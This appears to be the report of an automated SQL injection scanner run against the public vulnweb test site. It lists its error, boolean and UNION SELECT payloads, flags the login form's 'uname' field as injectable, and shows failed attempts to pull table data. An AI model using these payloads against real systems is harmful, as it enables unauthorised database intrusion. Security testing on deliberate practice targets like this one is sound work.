    -------------------- VULNERABILITY REPORT --------------------    


+--------------------------------------------------------------------
|                                                                    |
|  Target URL: http://testphp.vulnweb.com/login.php                  |
|                                                                    |
|  Request Method: POST                                              |
|                                                                    |
|  Crawl Depth: 1                                                    |
|                                                                    |
+--------------------------------------------------------------------


======================================================================
                         VULNERABILITY CHECK                          
======================================================================

=== Check: error, with: 

       -> '


=== Check: boolean, with: 

       -> 1' AND 1=1 --  
       -> 1' AND 1=2 -- 


=== Check: union, with: 

       -> ' UNION SELECT NULL --  
       -> ' UNION SELECT NULL, NULL --  
       -> ' UNION SELECT NULL, NULL, NULL -- 


== Form tested: userinfo.php

+-------+-------+---------+-------+
| Input | error | boolean | union |
+-------+-------+---------+-------+
| uname |       |         |   V   |
|  pass |       |         |       |
+-------+-------+---------+-------+


== Form tested: search.php?test=query

NO VULNERABILITY FOUND

== Form tested: 

NO VULNERABILITY FOUND

== Form tested: /secured/newuser.php

NO VULNERABILITY FOUND

== Form tested: //acunetix.us8.list-manage.com/subscribe/post?u=d7d847f8382b52d46a6547bcd&id=fbd39501d7

NO VULNERABILITY FOUND

======================================================================
                           DATA EXTRACTION                            
======================================================================

==> ENGINE: SQLite

==> TABLES

Error: Table 'acuart.sqlite_master' doesn't exist

==> COLUMNS

Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'sql FROM sqlite_master  -- ' AND pass='test'' at line 1

==> FULL DUMP

Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'sql, '|') FROM sqlite_master WHERE type='table'--' AND pass='test'' at line 1

    ---------------------------- END ----------------------------     
